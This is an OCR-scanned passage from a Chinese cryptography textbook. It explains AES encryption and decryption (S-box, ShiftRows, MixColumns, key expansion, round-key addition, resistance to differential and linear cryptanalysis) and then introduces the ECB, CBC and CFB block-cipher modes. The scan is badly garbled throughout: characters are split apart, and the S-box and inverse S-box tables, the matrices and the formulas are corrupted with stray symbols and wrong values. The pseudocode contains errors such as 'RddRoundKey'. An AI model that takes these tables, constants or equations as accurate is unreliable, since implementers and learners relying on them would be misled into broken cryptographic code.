有 一 定 的 代数 结构 ,能 够 抵抗 差分 密码 分 析 和 线性 密码 分 析 。 

差分 密码 分 析 的 基本 方法 是 通过 分 析 明 文 对 的 差 值 对 密 文 对 的 差 值 的 影响 来 发 现 某 些 
密 钥 值 。 线 性 密码 分 析 的 基本 方法 是 假设 已 知 大 量 明文 时 ,寻找 一 个 给 定 的 密码 算法 来 有 
效 地 线性 近似 被 破译 的 密码 系统 。 

AES 算法 既 消除 了 在 DES 里 会 出 现 弱 密 钥 和 半 弱 密 钥 的 可 能 性 ,又 消除 了 在 IDEA 
中 发 现 的 弱 密 性 ,因此 对 密 钥 的 选择 并 没有 任何 限制 。Rijndael 之 所 以 当选 是 由 于 AES 算 
法 汇聚 了 安全 人 性、 性能、 效率 .可 实现 性 及 灵活 性 等 诸多 优点 。 

1. AES 算法 概述 

AES 算法 是 一 种 可 变数 据 块 长 C(Ns ) 和 可 变 密 钥 长 (Ni ) 的 迭代 分 组 加 密 算法 ,其 数据 
块 长 和 密 钥 长 度 可 分 别 为 128、192 和 256 位 。 

AES 算法 以 字 节 (8 位 ) 和 字 (32 位 ) 为 处 理 单位 ,将 明文 分 成 N, 个 字 , 密 钥 分 成 Ne 个 
字 , 每 个 字 为 4 个 字 节 。 

今 变换 轮 数 N, 二 max{ N,Ni) 十 6, 则 算法 共 进行 一 个 初始 轮 ( 初 始 化 ) , N, 一 1 轮 变 换 
及 最 后 一 轮 变 换 , 即 AES 算法 共 进 行 N, 十 1 轮 变换 。 

当 AES 的 输入 明文 分 组 长 度 为 128 位 时 ,经 AES 加 密 或 解密 处 理 后 ,得 到 的 输出 也 是 
128 位 。AES 的 各 种 运算 是 以 字 节 为 基本 单位 进行 处 理 的 。 在 一 个 字 节 中 ,最 右边 的 位 是 
字 节 低位 ,最 左边 的 位 是 字 节 高 位 。 

对 明文 数据 块 加 密 或 解密 时 ,要 经 过 多 次 数据 变换 操作 ,每 一 次 变换 操作 都 产生 一 个 中 
间 结 果 , 这 个 中 间 结 果 称 为 状态 (State) 。 状 态 可 以 用 二 维 字 节 数组 表示 , 它 有 4 行 N; 列 ， 
数组 中 元 素 单位 为 字 节 , Nos 的 单位 为 字 。 

例如 , 当 AES 的 输入 明文 分 组 长 度 为 128 位 时 ,每 个 状态 也 有 128 位 。 设 有 状态 : 

从 左 到 右 按 顺序 将 状态 ; 划分 为 16 个 字 节 ,并 将 这 16 个 字 节 排 成 4X No 的 数 
组 ,N, 二 4。 


该 数组 称 为 状态 数组 ,AES 中 各 种 变换 都 是 基于 状态 数组 进行 处 理 的 。 

AES 进行 加 密 或 解密 时 , 先 将 输入 的 明文 或 密 文 按 so ,si0 ,sz0 ,ss0，501，sn，… 的 顺序 复 
制 到 状态 数组 中 ,加 密 或 解密 过 程 就 是 对 这 个 状态 数组 进行 变换 处 理 的 过 程 。 

加 密 或 解密 过 程 完成 后 ,输出 的 结果 就 是 变换 后 的 状态 数组 ,最 终 输出 的 密 文 或 明文 仍 
按 变 换 后 的 上 述 数组 的 列 序 顺序 输出 。 

AES 算 法 的 密 钥 也 可 以 用 二 维 字 节 数组 表示 , 它 有 4 行 N; 列 ,数组 中 元 素 单位 为 字 
节 ,N 的 单位 为 字 。 

AES 算法 的 每 轮 变换 由 4 种 不 同 的 变换 组 合 而 成 ,它们 分 别 是 S 盒 变 换 、 行 位 移 变换 、 
列 混合 变换 和 圈 密 钥 加 法 变换 。AES 变换 轮 数 N, 由 Ne 和 N 共同 决定 ,如 表 3.9 所 示 。 
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表 3.9 AES 密 钥 长 度 Ni ,分 组 长 度 Ni 个 字 与 变换 轮 数 N, 之 间 的 关系 


N, Ns=4 N,=6 = 
Ni=4 10 12 14 
Ni =6 座 12 14 
N= 14 14 14 


2. AES 算法 加 密 过 程 
AES 的 加 密 过 程 可 以 用 下 面 的 伪 语 言 代码 描述 : 


Cipher (plaintext, ciphertext, CipherKey) { // 初 始 化 
State=plaintext; // 状 态 state 初始 化 
KeyExpansion (CipherKey,ExpandedKey) ; // 生 成 扩展 密 钥 ExpandedKey 
RddRoundKey (State, ExpandedKey) ; // 圈 密 钥 加 法 变换 ,z=0 

1/ 前 及 -1 轮 

for(r=1; r<Nr; r++){ 
subBytes (State); //S 盒 变换 
ShiftRow(state) ; // 行 移 位 变换 
MixColumn (State) 7 // 列 混合 变换 
RddRoundKey (State, ExpandedKey) ; // 圈 密 钥 加 法 变换 
} 
// 最 后 一 轮 


SubBytes (State); 
ShiftRow (State); 
RddRoundKey (State, ExpandedKey); // 疾 密 钥 加 法 变换 ,天 玖 
ciphertext= state; 
其 中 plaintext 是 输入 明文 ,可 以 定义 成 plaintextL4X No] 数 组 ;ciphertext 是 输出 密 文 ， 
可 以 定义 成 ciphertext[4 XN ] 数 组 ;CipherKey 是 加 密 密 钥 ,可 以 定义 成 cipherKey 
[4X NN, 数组; 圈 密 钥 ExpandedKey 可 表示 成 w[LN X(N, 十 1) ] 数 组 ;state 是 状态 ,整个 加 
密 过 程 都 是 针对 State 进行 的 。 下 面 是 对 加 密 过 程 中 各 模块 的 说 明 。 
(1) S 盒 变换 SubBytes() 
S 盒 变换 又 称 为 字 节 变 换 , 是 一 个 针对 字 节 的 非 线性 .可 逆 变 换 。 它 将 状态 中 的 每 一 个 
字 节 非 线性 地 变换 为 另 一 个 字 节 ,作用 在 状态 上 每 个 字 节 的 变换 可 以 表示 为 SubBytes 
(State) , 它 由 两 个 可 逆 的 子 变 换 复 合 而 成 。 
@ 将 一 个 字 节 变 换 为 有 限 域 GF(2*) 中 的 乘法 逆 元 素 , 即 把 字 节 的 值 用 它 的 乘法 逆 代 
替 ,其 中 00 的 逆 就 是 自己 ,该 逆 元 素 用 一 个 字 节 5b 表示。 
@ 对 @ 中 的 结果 在 GF(2) 上 做 仿 射 变换 。 设 有 和 多项式 b(z) 经 S 盒 变换 后 为 0 (z) ,对 
应 系数 为 


argsn a 


b= bbsbsbabsbabibo, 太一 .0705050403020100 。 
今 
有 


7 6 2 
u(z) = 二 z 十 zi 十 十 Xt 十]， cx) 二 z 十 x 十 Tz 十 


仿 射 变换 可 以 表示 为 8 (x) 二 u(rx)，b(z) 十 c(x) mod (x8 十 1) ,用 和 矩阵 写成 系数 形式 : 
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bo 1 00 OO Ly 
四 oe 
0 a i a 2 | 
0 eol 
| Iiiiiioo ol lo 
的 六: 汪 下 了 工 生 刘海 生 | 中 莓 :外 更 
天 | IO WL EL Gs 
下 下 


也 可 表示 为 
= b; 四 bo nos 四 baits mas D pae mas 四 bitn mms Oa, 0<i<7 
C= (crcecscacacacico) = (0110 0011) 
例如 ,有 十 六 进 制 数 53, 二 进 制 表示 为 0101 0011, 多 项 式 表示 为 x* 十 x 十 十 1。 该 多 
项 式 的 乘法 道 为 xz 十 zx 十 十 zr。 因 此 , 5 二 bi0b6bsbsb3bsb10o 二 1100 1010 
二 (bo 十 by 十 bs 十 bs 十 by 十 co0) mod 2 一 1… 
0 = bbsbsb4bsb201b = 1110 1101 = ED 
可 以 将 变换 SubBytes() 对 各 种 可 能 字 节 的 变换 结果 排 成 一 个 表 , 如 表 3. 10 所 示 ,该 表 
称 为 AES 的 S 盒 。 通 过 查 表 可 以 直接 得 到 Subbytes() 的 输出 ,这 样 可 以 加 快 程序 执行 速 
度 。 如 果 状 态 中 的 一 个 字 节 为 zy, 则 S 盒 中 第 xz 行 第 y 列 的 字 节 就 是 SubBytes() 的 输出 。 
例如 , 设 有 状态 中 的 一 个 字 节 为 C4H, 则 SubBytes() 的 输出 为 S 盒 中 第 C 行 第 4 列 的 字 节 
值 1CH。 
表 3.10 S 盒 变换 表 
列 号 y 
0 1 2 3 4 5 6 和 8 91|1A|BICIDIEIE 


63 |7C|17717B|F2|16B|6F|C5 1130101167|12B|FE|D7|AB|76 
CA|180|1Cc917D|EFAI591|147 |EFo|AD|D4|A2|AF|9CIAL|72|1C0 
B7|FD| 93|26|36|3F|IF7|ICC|34|A5|IES|FI|71|Ds|31|15 
04|1C7|23|C3|18|96|05|9A|07|12|80|E2|EB|27|B2|75 


行 号 z 


imololmis>|lolol~|iolaln iwlvw|-|o 
b= 
= 
oo 
包 
本 
be | 
Ee 
] SN 
Co 
> 
= 
So 
Co 
Co 
心 
[0 
器 
冲 
上 
rs 
一 | 
[ee 
a 
[a 
© 
史 
ew 
ls 
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可 以 看 出 ,AES 中 S 盒 具有 一 定 的 代数 结构 ,而 DES 中 S 盒 是 人 为 构造 的 。 


(2) 行 移 位 变换 ShiftRows() 


行 移 位 变换 对 一 个 状态 的 每 一 行 循 环 左 移 不 同 的 位 移 量 ,第 0 行 不 移 位 ,保持 不 变 , 第 
1 行 移 动 c 个 字 节 ,第 2 行 移动 c 个 字 节 ,第 3 行 移动 cs 个 字 节 。ci ,cz ,cs 值 依赖 于 分 组 


长 度 Ni 的 大 小 ,如 表 3. 11 所 示 。 


表 3.11 不 同 块 长 N; 的 位 移 值 C; 
N, 总 G 全 
4 下 有 入 
6 1 2 3 
8 1 3 4 
NN, 二 4 时 的 行 移 位 变换 如 图 3. 6 所 示 。 
So So So So So So So S03 
Sio Si Sl Sl 行 变换 Sn Sl S13 Sio 
So S21 S52 S53 Sy S53 Sy Sl 
S30 S31 Sa S33 S33 S30 S31 $3 


图 3.6 ShiftRows() 变 换 
(3) 列 混 合 变换 MixColumns() 
列 混合 变换 是 对 一 个 状态 逐 列 进行 变换 , 它 将 一 个 状态 的 每 一 列 视 为 有 限 域 GF(2*) 上 
的 一 个 多 项 式 ,如 图 3.7 所 示 。 


So So Sm Sos So So Sm So 
Sio Si Si S's 列 变换 So SN Sm S's 
Sy0 S21 5»» 5» S20 Sa S2 S's 
S30 S31 S32 533 S's0 Sa Sa S33 


图 3.7 MixColumns() 变 换 


AC A 
则 $ (7)=a(r)Ds (rz), 0<Ij<3 
其 中 ,a(z) 二 {03}z’ 十 {01)z? 十 {01)z 十 (102) 是 AES 选择 的 一 个 逆 元 多 项 式 , 四 表示 模 
x 十 1 乘法 。 
可 以 将 %(z)=a(z) 由 5(z) 表 示 为 矩阵 乘法 : 
so; 02 03 01 011[sw 
| 民 02 03 a | 
sy| |ol ol 02 03||s, 
5 03 01 01 02|;s, 
(4) 扩展 密 钥 KeyExpansion() 
AES 算法 利用 外 部 输入 字数 为 N; 的 密 钥 串 K, 通 过 扩展 密 钥 程序 得 到 共 Ne X CN, 十 
1) 个 字 的 扩展 密 钥 串 。 对 扩展 密 钥 按 每 组 N 个 字 分 组 ,每 组 的 密 钥 称 为 圈 密 钥 。 这 样 就 


0<j<3 
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可 以 产生 N, 十 1 个 圈 密 钥 , 每 个 圈 密 钥 由 N; 个 字 组 成 。 每 个 字 用 w[ 表示 ,其 中 i 二 0,1， 
2,°",N; X(N,+1)—1。 

扩展 密 钥 程序 涉及 RotWord() 、SubWord() 和 Rcon[ |] 模块。 它们 的 工作 方式 如 下 : 

@ 位 置 变换 RotWord() : 把 一 个 4 字 节 的 输入 序列 (4a0,al,a2,a3) 循 环 左 移 一 个 字 节 
后 输出 。 例 如 将 (a0,al,a2,a3) 循 环 左 移 一 个 字 节 后 输出 为 (al,a2,a3,a0)。 

@ SubWord() : 把 一 个 4 字 节 的 输入 序列 (a0,al,a2,a3) 的 每 一 个 字 节 进行 S 盒 变 换 ， 
然后 作为 输出 。 

@ 变换 Reon[ ]: 是 一 个 10 个 字 的 常量 数组 ,Recon[i] 是 一 个 32 位 字符 串 (x;-1 ,00， 
00,00)。 这 里 z+ 二 (02) ,zi-1 是 x==(02) 的 (i 一 1) 次 竹 的 十 六 进 制 表示 , 即 

20 三 (0]1) 三 (02)sx1 二 {02} 2 

这 里 *。 ”表示 有 限 域 GF(2) 中 的 乘法 。 

扩展 密 钥 扩 展 前 Ni 个 字 就 是 外 部 密 钥 CipherKey, 以 后 的 字 w[ 站 等 于 它 前 一 个 字 
w[i 一 1] 与 前 第 Ni 个 字 w[i 一 Nj] 的 异 或 , 即 w[ 让 =w[i 一 1] 旬 w[i 一 Ni]。 但 是 若 i 等 于 
NN, 的 倍数 , 则 w[i]=w[i 一 Ni]SubWord(RotWord(w[i 一 1]))@Reon[i/Ni]。 

(5) 圈 密 钥 加 法 变换 AddRoundKey() 

圈 密 钥 加 法 变换 是 将 一 个 圈 密 钥 按 位 异 或 到 一 个 状态 上 ,如 图 3.8 所 示 , 圈 密 钥 的 长 度 
为 N, 个 字 。 圈 密 钥 按 顺 序 取 自 扩展 密 钥 ExpandedKey, 扩 展 密 钥 是 由 原始 密 钥 经 过 扩展 
后 得 到 的 ,扩展 密 钥 的 长 度 为 N,(N, 十 1) 个 字 。 


Soo Sol So So So So So So 
Sio ST Sn S13 图 密 钥 加 法 变换 Si SN Sl Ss 
Sy0 S51 5; Sa Sy Sa 5' S73 
So0 SS Ss Ss S30 SS Sy 333 


图 3.8 圈 密 钥 加 法 变换 


例如 (S65SisSg :Ss)=(Sy SiS OD Ri bbs) 0SI< 

其 中 (ko ,kij ,kj ,ks;) 表 示 扩 展 密 钥 中 的 第 rXN, 十 j 个 字 ,0<r<N,。 圈 密 钥 按 列 So。 
SioSzo So"…Sos S13Sz3Sss 顺 序 与 状态 上 各 元 素 进 行 异 或 运算 。 

在 AES 加 密 过 程 中 ,r= 二 0 时 是 第 一 轮 变换 之 前 的 初始 圈 密 钥 加 法 变换 ;r= N, 时 是 输 
出 之 前 的 最 后 一 轮 密 钥 加 法 变换 。 

3. AES 算法 解密 过 程 

AES 的 解密 过 程 可 以 用 下 面 的 伪 语 言 代码 描述 ; 


InvCipher (ciphertext,plaintext, InvCipherKey){ // 初 始 化 
state= ciphertext; // 状 态 state 初始 化 
KeyExpansion (InvCipherKey, ExpandedKey) ; // 生 成 扩展 密 钥 
AddRoundKey (State,ExpandedKey) ;7 // 圈 密 钥 加 法 变换 ,二 NN 
for(r=N.-1;r>1;r--)t{ // 前 也 -1 轮 
InvShi ftRow (State); // 道 行 移 位 变换 
InvSubBytes (State) 7 // 道 S 盒 变换 
InvMixColumn (State) ; // 逆 列 混合 变换 
RddRoundKey (State, ExpandedKey) ; // 圈 密 钥 加 法 变换 
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量 。 


} // 最 后 一 轮 
InvShiftRow (State); 
InvSubBytes (State); 
RddRoundKey (State, ExpandedKey) ; // 圈 密 钥 加 法 变换 ,天 0 


Plaintext= state;} 


(1) 道行 移 位 变换 InvShiftRows() 
InvShifiRows() 是 ShiftRows() 的 逆 变 换 , 是 对 一 个 状态 的 每 一 行 循环 右 移 不 同 的 位 移 
第 0 行 不 移 位 ,保持 不 变 , 第 1 行 移动 C, 个 字 节 ,第 2 行 移动 C* 个 字 节 ,第 3 行 移 动 C; 


个 字 节 。Ci ,Cs ,Cs 值 依赖 于 分 组 长 度 N 的 大 小 ,如 表 3. 11 所 示 。 


(2) 道 S 盒 变换 lnvSubBytes() 
InvSubBytes() 是 SubBytes() 的 逆 变 换 , 它 将 状态 中 的 每 一 个 字 节 非 线 性 地 变换 为 另 


一 个 字 节 。InvSubBytes() 首 先 对 一 个 字 节 bi;565sb4530zb1bo 在 GF(2) 上 做 SubBytes 中 仿 
射 变换 的 逆 变 换 。 即 : 


的 10001111Tw 
外 too 01d la h 
Db VY LL0 0 0 YL th 0 
0 下 
uli1111000||, Ilo 
久 1 0 0 ey 
沽 由 | 证 计生 证 
se Lo iG hm | Lo 


然后 InvSubBytes() 返 回 字 节 byb4b4b4bsb2b4by 在 有 限 域 GF(2*) 中 的 逆 元 素 。 逆 S 


盒 变换 过 程 与 S 盒 变换 过 程 刚好 相反 。 


同样 ,可 以 将 道 S 盒 变换 对 各 种 可 能 字 节 的 变换 结果 排 成 一 个 表 , 如 表 3. 12 所 示 。 该 


表 称 为 AES 的 逆 S 盒 变换 表 或 逆 字 节 代 蔡 表 。 如 果 状 态 中 的 一 个 字 节 为 zy, 则 逆 S 盒 中 
第 z 行 ,第 y 列 的 字 节 就 是 InvSubBytes() 的 返回 值 。 


表 3.12 逆 S 盒 变换 表 
避 医 看 攻 二 医 测 医 下 攻 罗 区 汉 枚 本 本 : 汪 攻 : 医 :本 区 :本 攻 * 湖 医 : 四 医 > 梧 恬 > 


0 52 | 09 |6A |Dp|30|36|A5|38|BH| 4 |1A3| 哎 |81|E 11D7 |FB 
1 0 | 区-| 各 | 要:| 是 | 下 | 本 | 8 对 | 埋 | 相 | 相 | 税 1 亚 | 功 | 三 
2 54 | 7B |94|32|A6|Cz |23|3D|EEI4C|195 |0B| 妇 |EFAIC3 | 乌 
3 08 |2E|Al|i66|28|1Dp|124|1B2|176|5B|A2|4916D|8B|DI |25 
4 72 | F8|F6|64|86 |68|98|16|D4|AA4ISCICC|ISD| 65 | B6 | 92 
5 6C 170|49|50|FD|IED|B9|IDA|SE|15 |46|57|A7| 8D | 9D | 84 
6 90 | D8 |AB|00 |8C|IBC|ID3|0oA|IF?|E4|58 |05 | Bs | B3 | 45 |06 
VA DI2C|1E|SF|ICA|I3F|0F|02|Cl|IAFIBD|0|0 |13|83A|B 
8 3A | 9 1 |1DC|IEA|97|F2|ICF|ICE|IFE IBM|E |73 
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9 96 | AC | TE | 22 |E|AD|35|85 | EI BI HE| | |D|eE 
A a | FAD | | | Br | 6 | | AAA | BE | 
B |IFC|S5S6|3E|4B|C|ID|79|20|9A|IDB|IC |FE|78|CD|SA|F 
9 IDDI A | 0c | 
D 60 |51|7F|IA9|19|B |4A|I0D|2D|Es |7A| IF| 93|C9 | 9C |EF 
E |IA0O|E0|3B|4D|IAE|I2A|F5s5|B|CS8|IEB|IBB|3C| 83|53|99 |61 
F 17 |2B|04|17E|IBA|I77?|ID|26 | El|69 |14|63|55|21 |o0cC|7D 


例如 ,状态 中 的 一 个 字 节 为 1CH, 则 InvSubBytes() 的 输出 是 逆 S 盒 中 第 1 行 第 C 列 的 
字 节 值 C4H。 

(3) 逆 列 混合 变换 InvMixColumns() 

InVMixColumns() 是 MixColumns() 的 逆 变 换 。InvMixColumns() 对 一 个 状态 逐 列 进 
行 变换 , 它 将 一 个 状态 的 每 一 列 视 为 有 限 域 GF(2*) 上 的 一 个 多 项 式 。 

InvMixColumns() 将 状态 的 每 一 列 所 对 应 的 GF(2) 上 的 多 项 式 模 xz! 十 1 乘 以 多 项 式 。 


令 


5(z) = sr + sr’ syz tso, 
Slay = so’ + sox? 十 sz 十 sw， < 
则 
sz) =a(r) Bs(r), 0Zj<3 
其 中 ,a-!1(x)=={0B}x’ 十 {0D}z? 十 {09}z 十 {0E} 
a 1(zx) 是 a(x) 二 {03}z 十 {01)z? 十 {01}z 十 {02} 模 zx! 十 1 的 乘法 逆 多 项 式 。 
(4) 圈 密 钥 的 使 用 
AES 解密 时 的 扩展 密 钥 程 序 与 加 密 时 的 扩展 密 钥 程序 相同 ,但 解密 时 圈 密 钥 的 使 用 顺 
序 与 加 密 过 程 正好 相反 。 同 时 , 除 第 一 个 和 最 后 一 个 圈 密 钥 外 ,其 余 圈 密 钥 需要 进行 逆 混 合 
列 变换 。 
例如 ,如 果 加 密 时 圈 密 钥 为 ,ki,，… ,kv， 那 么 解密 时 密 钥 为 evw, InvMixColumns 
(RNw_1)，…,InvMixColumns(CR2 ) ,ko 。 
可 以 将 ¥(z)==a 1(z) 田 s;(z) 表 示 为 矩阵 乘法 : 


So 0OE 0B 0D 091[Sw 
Sy 区 oF 0B | Sy 


S | |0D 09 0OE 0B|S;, 
le La 0D 09 ml | 
4. AES 算法 安全 性 
目前 ,对 所 有 已 知 攻击 而 言 ,AES 算法 是 安全 的 。 它 设计 的 各 个 方面 融合 了 各 种 特色 ， 
从 而 为 抵抗 各 种 攻击 提供 了 安全 性 。 例 如 ,S 盒 构造 中 有 限 域 逆 操 作 的 使 用 ,使 得 线性 逼近 
和 差分 分 布 表 中 的 各 项 趋 近 于 均匀 分 布 , 这 就 为 抵御 差分 和 线性 攻击 提供 了 安全 性 。 
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对 于 线性 攻击 ,AES 算法 经 过 4 圈 变 换 后 的 线性 轨迹 的 相关 性 不 大 于 2 “ ,8 圈 变 换 后 
不 大 于 2 "”。 对 于 差分 攻击 ,AES 算法 经 过 4 圈 变 换 后 的 差分 轨迹 预测 概率 不 大 于 2-'”， 
8 图 变换 后 不 大 于 2 。 

类 似 地 ,线性 变换 MixColumns 使 得 找到 包含 “ 较 少 ”活动 S 盒 的 差分 和 线性 攻击 成 为 
不 可 能 。 对 AES 算法 ,现在 还 不 存在 快 于 穷 举 密 钥 攻 击 的 方法 。 即 使 是 对 AES 算法 减少 
迭代 轮 数 的 各 种 变 体 而 言 的 “最 好 ?攻击 ,对 10 轮 的 AES 也 是 无 效 的 。 这 就 意味 着 对 AES 
密码 最 有 效 的 攻击 仍然 是 穷 举 密 钥 攻 击 。 


3.2.4 分 组 密码 的 工作 模式 


分 组 密码 在 加 密 时 明文 分 组 的 长 度 是 固定 的 。 而 实用 中 待 加 密 消息 的 数据 量 是 不 定 
的 ,数据 格式 也 可 能 是 多 种 多 样 的 ,为 了 能 在 各 种 应 用 场合 安全 地 使 用 分 组 密码 ,通常 对 不 
同 的 使 用 目的 运用 不 同 的 工作 模式 。 所 谓 分 组 密码 的 工作 模式 就 是 以 该 分 组 密码 为 基础 构 
造 的 一 个 密码 系统 。 目 前 已 提出 许多 种 分 组 密码 的 工作 模式 ,如 电码 本 (ECB) 、 密 码 分 组 链 
接 (CBC) ,密码 反馈 (CFB) .输出 反馈 (OFB) 、 级 连 (CM) .计数 器 、 分 组 链接 (BC) .扩散 密码 
分 组 链接 (PCBCL) ,明文 反馈 (PFB) 和 非 线性 函数 输出 反馈 (OFBNLF) 等 模式 。 下 面 以 
DES 算法 为 例 介 绍 其 中 最 重要 和 最 基本 的 4 种 工作 模式 。 

1. 电码 本 模式 (ECB) 

ECB(Electronic codeBook) 模 式 是 最 简单 的 运行 模式 , 它 一 次 对 一 个 64 位 长 的 明文 分 
组 进行 加 密 , 而 且 每 次 的 加 密 密 钥 都 相同 ,如 


户 Ci 
图 3.9 所 示 。 当 密 钥 取 定 时 ,对 于 每 一 个 明文 分 | | 
组 都 有 唯一 的 一 个 密 文 分 组 与 之 对 应 。 因 此 可 以 Kk。 加密 PI 
想象 有 一 个 非常 大 的 电码 本 ,对 每 一 个 可 能 的 明 T 
文 分 组 ,在 电码 本 中 都 有 唯一 与 之 对 应 的 密 文 G ? 
分 组 。 (a) 加 密 (b) 解密 
对 大 于 64 位 的 报 文 , 需 将 其 分 为 长 为 64 位 图 3.9 ECB 模 式 


的 分 组 ,最 后 一 个 分 组 可 能 需要 填充 。 解 密 过 程 
也 是 一 次 对 一 个 密 文 分 组 进行 解密 ,而 且 每 次 解密 都 使 用 同一 个 密 钥 。 如 图 3.9 所 示 ,明文 
是 由 长 为 64 位 的 分 组 序列 P,P;,… ,Pw 构成 的 ,相应 的 密 文 分 组 序列 是 Ci ,Cs,…,Cy， 
Pd 

ECB 用 于 短 数 据 ( 如 加 密 密 钥 ) 时 非常 理想 ,但 如 果 同 一 明文 分 组 在 消息 中 反复 出 现 ， 
产生 的 密 文 分 组 就 会 相同 ,因此 用 于 长 消息 时 可 能 不 够 安全 。 如 果 消 息 有 固定 的 结构 ,密码 
分 析 者 就 有 可 能 会 利用 这 种 规律 。 例 如 ,如 果 已 知 消息 总 是 以 某 个 事先 规定 的 字段 开始 , 那 
么 分 析 者 就 有 可 能 会 得 到 许多 明文 - 密 文 对 。 如 果 消 息 有 重复 的 成 分 ,而 重复 的 周期 是 64 
位 的 倍数 ,那么 这 些 成 分 都 有 可 能 会 被 密码 分 析 者 识别 出 来 ,就 可 能 在 不 知道 密 钥 的 情况 下 
恢复 出 明文 。 更 严重 的 问题 是 敌手 通过 重 放 , 可 以 在 不 知道 密 钥 的 情况 下 修改 被 加 密 过 的 
消息 ,用 这 种 办 法 欺骗 接收 方 。 

2. 密码 分 组 链接 模式 (CBC) 

为 了 克服 ECB 的 缺陷 ,希望 设计 一 种 方案 使 同一 明文 分 组 重复 出 现时 产生 的 密 文 分 组 
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不 同 。 一 种 简单 的 方案 就 是 密码 分 组 链接 (Cipher Block Chaining) 模 式 , 如 图 3. 10 所 示 。 
每 次 加 密使 用 同一 个 密 钥 , 加 密 算法 的 输入 是 当 p, C 
前 明文 组 和 前 一 次 密 文 组 的 异 或 。 因 此 加 密 算 法 | 


的 输入 与 明文 分 组 之 间 不 再 有 固定 的 关系 ,所 以 K 一 一 | 解密 
重复 的 明文 分 组 不 会 在 密 文中 暴露 。 人 时 于 
解密 时 ,每 一 个 密 文 分 组 解密 后 ,再 与 前 一 个 
密 文 分 组 异 或 来 产生 出 明文 分 组 , 即 C p, 
DiLC:] 由 Cr- = DiLEiLC: (3 Pi]] 四 Ci (a) 加 密 (b) 解密 
=Cn@PDC=P 图 3.10 CBC 模式 


这 里 Ci=Ei[C; 1@P;],i=1,2,…,N。 

为 了 产生 第 一 个 密 文 分 组 ,需要 一 个 初始 向 量 Cs = 二 Vi 与 第 一 个 明文 分 组 异 或 。 解 密 
时 ,Vi 与 解密 算法 的 第 一 输出 进行 异 或 ,以 恢复 第 一 个 明文 分 组 。V1 对 于 收 、 发 双方 都 应 
是 已 知 的 。 为 使 安全 性 程度 最 高 ,Vi 应 像 密 钥 一 样 被 保护 。 如 果 攻 击 者 能 欺骗 接收 方 使 用 
不 同 的 Vi 值 ,攻击 者 就 能 够 在 第 一 个 明文 分 组 中 改变 某 些 选 定 的 位 ,这 是 因为 ， 

C = ELVi P,P =V 由 D,[LC] 

用 X(G) 表 示 64 位 分 组 X 的 第 i 位 ,那么 Pi(i)= 二 V1( 让 外 Di[C1](i), 由 异 或 的 性 质 
可 得 : 

Pi1(D)’ = Vi(i)’ @ DLC) 

其 中 撤 号 表示 位 补 。 上 式 意 味 着 如 果 攻 击 者 算 改 Vi 中 的 某 些 位 , 则 接收 方 收 到 的 已 
中 相应 的 位 也 会 发 生变 化 。 因 此 使 用 Vi 后 ,完全 相同 的 明文 被 加 密 成 不 同 的 密 文 ,敌手 再 
用 分 组 重 放 进 行 攻击 是 完全 不 可 能 的 。 

由 于 CBC 模式 的 链接 机 制 , 它 对 加 密 大 于 64 位 的 消息 非常 合适 。CBC 模式 除了 能 够 
获得 保密 性 外 ,还 能 用 于 认证 ,可 以 识别 攻击 者 在 密 文 传输 中 是 否 做 了 数据 算 改 ,比如 组 的 
重 放 、 嵌 入 和 删除 等 ,但 同时 也 会 导致 错误 传播 , 密 文 传输 中 任何 一 组 发 生 错 误 不 仅 会 影响 
该 组 的 正确 译 码 ,也 会 影响 其 下 一 组 的 正确 译 码 。 

3. 密码 反馈 模式 (CFB) 

若 待 加 密 的 消息 必须 按 字符 (如 电 传 电报 ) 处 理 时 ,可 以 采用 CFB(Cipher FeedBaek) 模 
式 或 OFB(Output FeedBack) 模 式 , 这 样 做 事实 上 是 将 DES 转换 成 为 流 密码 。 流 密码 不 需 
要 对 消息 进行 填充 ,而 且 运 行 是 实时 的 。 因 此 ,如 果 只 是 传送 字母 流 , 就 可 使 用 流 密 码 对 每 
个 字母 直接 加 密 并 传送 。 

流 密 码 的 密 文 和 明文 一 样 长 ,因此 ,如 果 需 要 发 送 的 每 个 字符 长 为 8 位 ,就 应 按 每 次 8 
位 来 加 密 。 如 果 超 过 8 位 ,就 会 造成 浪费 。 图 3. 11 所 示 就 是 CFB 的 加 密 模式 。 设 传送 的 
每 个 单元 (如 一 个 字符 ) 是 j 位 长 ,通常 取 j 二 8。 与 CBC 模式 一 样 ,明文 单元 被 链接 在 一 起 ， 
使 得 密 文 是 前 面 所 有 明文 的 函数 。 

加 密 时 ,加 密 算法 的 输入 是 64 位 移 位 寄存 器 ,其 初 值 为 某 个 初始 向 量 Vi。 加 密 算法 输 
出 的 最 左边 (最 高 有 效 位 )j 位 与 明文 的 第 一 个 单元 Pi 异 或 ,产生 出 密 文 的 第 一 个 单元 Ci， 
并 传输 该 单元 。 然 后 将 移 位 寄存 器 中 的 内 容 左 移 j 位 并 将 C; 送 入 移 位 寄存 器 的 最 右边 (最 
低 有 效 位 )j 位 。 这 一 过 程 持续 进行 直到 明文 的 所 有 单元 都 被 加 密 为 止 。 

解密 时 (解密 模式 图 除了 Cl…C;_, 、P1…P;_ 至 由 的 箭头 方向 相反 外 ,其 他 都 与 加 密 模 
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64 位 本 = 64 位 上- 一 … 
左 移 / 位 左 移 /位 1 
| 64 位 | 施 64- 位 “| 从 nh 
| | 1 | 1 
64 位 一 一 64 位 … 和 一 | 64 位 
| | 
K 一 =| 加 密 K 一 ~| 加密 上 一 | 加 密 
| | .| 
:| 位 | 64 位 (丢弃 ) /位 | 64-j 位 (丢弃 ) | /位 | 64-/ 位 (丢弃 ) 
Ca -0 Ci -6 CI -0 
Pi Pp, P 


图 3.11 CFB 的 加 密 模式 


式 图 相同 ) ,除了 将 收 到 的 密 文 单元 与 加 密 函数 的 输出 进行 异 或 以 产生 明文 单元 外 ,其 他 与 
加 密 采 用 相同 的 方案 。 应 当 注 意 ,这 里 仍然 使 用 加 密 算法 而 不 是 解密 算法 ,因为 P; 一 C, 四 
S,(E(V1)), 

这 里 S;(X) 是 X 的 第 j 个 最 高 有 效 位 ,Ci 二 PS;(E(V1))。 可 以 证 明 以 后 各 步 也 有 
类 似 关 系 。 除 了 拥有 CBC 模式 的 优点 外 ,CFB 模式 还 能 适应 用 户 不 同 的 数据 格式 的 需要 。 
当然 , 它 也 会 导致 错误 传播 ,还 有 降低 数据 加 密 速度 的 缺点 。 

4. 输出 反馈 模式 (OFB) 

OFB 的 加 密 模式 如 图 3. 12 所 示 ( 解 密 模式 图 同样 只 有 C; 和 P; 至 由 的 箭头 方向 相 
反 )。OFB(Output FeedBack) 模 式 在 结构 上 类 似 于 CFB, 用 分 组 密码 产生 一 个 随机 密 钥 流 ， 
